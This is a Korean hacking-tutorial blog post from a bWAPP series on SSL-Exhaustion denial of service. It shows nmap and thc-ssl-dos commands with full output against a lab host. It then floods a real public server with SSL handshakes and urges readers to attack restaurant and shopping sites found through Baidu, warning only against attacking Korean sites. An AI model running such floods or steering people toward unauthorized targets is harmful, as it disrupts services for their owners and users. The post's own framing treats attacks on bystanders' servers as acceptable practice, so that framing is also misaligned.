웹 해킹 bWAPP - 69. A5 - Security Misconfiguration - Denial-of-Service(SSL-Exhaustion)
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
1. Security Misconfiguration
- OWASP Top10 A5 - 잘못된 보안 구성
- 서버/시스템/DB/네트워크 장비/웹 설정 요류로 인하여 발생하는 취약점이다.
- Ex) 디렉토리 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, DoS/DDos 공격,
특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업/임시/robots 파일
2. Dos/DDos 공격
- 대량 패켓들을 전송하여 시스템/서버/네트워크 리소스를 고갈시켜 부하 발생, 요청 방해 및 연결 거부를 발생하는 공격이다.
- 단, 정보 유출에 대한 취약점은 없지만, 서비스가 마비되기 때문에 사용자 및 기업 입장에서 시간/비용 손실을 발생시킨다.
- DDos는 악성 코드에 감염된 시스템(좀비 PC)들을 이용하여 DoS 공격을 실시하는 방법이다.
- Ex) 최근 국내 Dos/DDos 공격 사례 : 디시인사이드
- 기사 : https://www.dailysecu.com/?mod=news&act=articleView&idxno=44010
http://news.mtn.co.kr/newscenter/news_viewer.mtn?gidx=2019011117453837457
3. SSL-Exhaustion
- SSL 핸드쉐이킹 과정에서 클라이언트가 서버쪽으로 키 재요청을 플러딩하는 공격이다.
- 그렇기 때문에 실제 클라이언트의 SSL 연결을 방해를 시키며, 서버 부하를 발생시키게 된다.
- 참고로 SSL 핸드쉐이킹은 TCP 핸드쉐이킹 보다 기본적으로 15% 정도의 부하가 발생한다.
4. Security Misconfiguration - Denial-of-Service(SSL-Exhaustion)
- 이 시나리오는 'thc-ssl-dos' 툴을 이용하여 SSL-Exhaustion 공격을 진행할 예정이다.
Ex1) Security Misconfiguration - Denial-of-Service(SSL-Exhaustion) 이해 I
보안 레벨 선택 및 시나리오 선택
bWAPP에서는 8433 포트로 공격을 실시하고 알려주지만, 안됨
bWAPP을 타켓으로 스캐닝 실시
|
root@kali:~# nmap -sS -sV 192.168.20.205
Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-15 19:46 KST
Nmap scan report for 192.168.20.205
Host is up (0.00016s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
443/tcp open ssl/http Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
512/tcp open exec?
513/tcp open login?
514/tcp open shell?
666/tcp open doom?
3306/tcp open mysql?
5901/tcp open vnc VNC (protocol 3.8)
6001/tcp open X11 (access denied)
8080/tcp open http nginx 1.4.0
8443/tcp open ssl/http nginx 1.4.0
9080/tcp open http lighttpd 1.4.19
|
와이어샤크 실행 및 eth1 캡처 실시
SSL-Exhaustion 공격 실시(bWAPP으로는 제대로된 테스트 불가능)
|
root@kali:/usr/bin# thc-ssl-dos 192.168.20.205 443 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org
Twitter @hackerschoice
Greetingz: the french underground
Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
ERROR: Target has disabled renegotiations.
Use your own skills to modify the source to test/attack
the target [hint: TCP reconnect for every handshake].
(Ctrl+C)
|
와이어샤크 캡처 내용 확인
Ex2) Security Misconfiguration - Denial-of-Service(SSL-Exhaustion) 이해 II
- 시스템 상태 확인 사이트 : https://isitup.org/
'189.89.227.195' 서버 상태 확인 실시
'189.89.227.195' 서버 상태 UP 확인
'189.89.227.195'으로 SSL-Exhaustion 공격 실시
|
root@kali:~# thc-ssl-dos 189.89.227.195 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org
Twitter @hackerschoice
Greetingz: the french underground
Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 1 [1.00 h/s], 5 Conn, 0 Err
Handshakes 6 [5.17 h/s], 8 Conn, 0 Err
Handshakes 17 [11.01 h/s], 11 Conn, 0 Err
Handshakes 35 [17.55 h/s], 15 Conn, 0 Err
Handshakes 56 [21.33 h/s], 19 Conn, 0 Err
Handshakes 87 [30.14 h/s], 22 Conn, 0 Err
Handshakes 118 [32.13 h/s], 25 Conn, 0 Err
Handshakes 164 [46.05 h/s], 29 Conn, 0 Err
Handshakes 206 [41.12 h/s], 32 Conn, 0 Err
Handshakes 256 [50.79 h/s], 36 Conn, 0 Err
Handshakes 310 [53.81 h/s], 39 Conn, 0 Err
Handshakes 373 [63.48 h/s], 43 Conn, 0 Err
Handshakes 444 [70.49 h/s], 46 Conn, 0 Err
Handshakes 522 [78.72 h/s], 50 Conn, 0 Err
Handshakes 604 [82.25 h/s], 53 Conn, 0 Err
Handshakes 682 [77.91 h/s], 57 Conn, 0 Err
Handshakes 771 [88.20 h/s], 60 Conn, 0 Err
Handshakes 881 [111.02 h/s], 64 Conn, 0 Err
Handshakes 983 [102.00 h/s], 67 Conn, 0 Err
Handshakes 1088 [104.79 h/s], 71 Conn, 0 Err
Handshakes 1182 [94.20 h/s], 74 Conn, 0 Err
Handshakes 1298 [116.01 h/s], 78 Conn, 0 Err
Handshakes 1425 [127.00 h/s], 81 Conn, 0 Err
Handshakes 1566 [140.76 h/s], 85 Conn, 0 Err
Handshakes 1706 [140.19 h/s], 88 Conn, 0 Err
Handshakes 1766 [59.95 h/s], 92 Conn, 0 Err
Handshakes 1868 [102.01 h/s], 95 Conn, 0 Err
Handshakes 2024 [156.22 h/s], 99 Conn, 0 Err
(Ctrl+C)
|
와이어샤크 캡처 내용 확인
와이어샤크 캡처 내용 확인
'189.89.227.195' 상태 확인 실시
'189.89.227.195' 서버 상태 UP 확인
[주의사항] 중국 검색 엔진 (사이트 주소 : http://www.baidu.com)
- 위의 테스트 IP 주소는 유튜브 동영상에서 참고한 주소이다.
- 중국의 검색 엔진을 통해서 식당, 쇼핑센터 기타 등등 사이트를 조회해서 테스트하는 것을 권장한다.
- 국내 사이트로 테스트를 할 경우, 법적 책임은 본인에게 있다. 제발 교육기관 안에서 하지 말기...
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
웹해킹 69. A5 - bWAPP Security Misconfiguration - Denial-of-Service(SSL-Exhaustion) https://youtu.be/p3Sfy9nHr6o
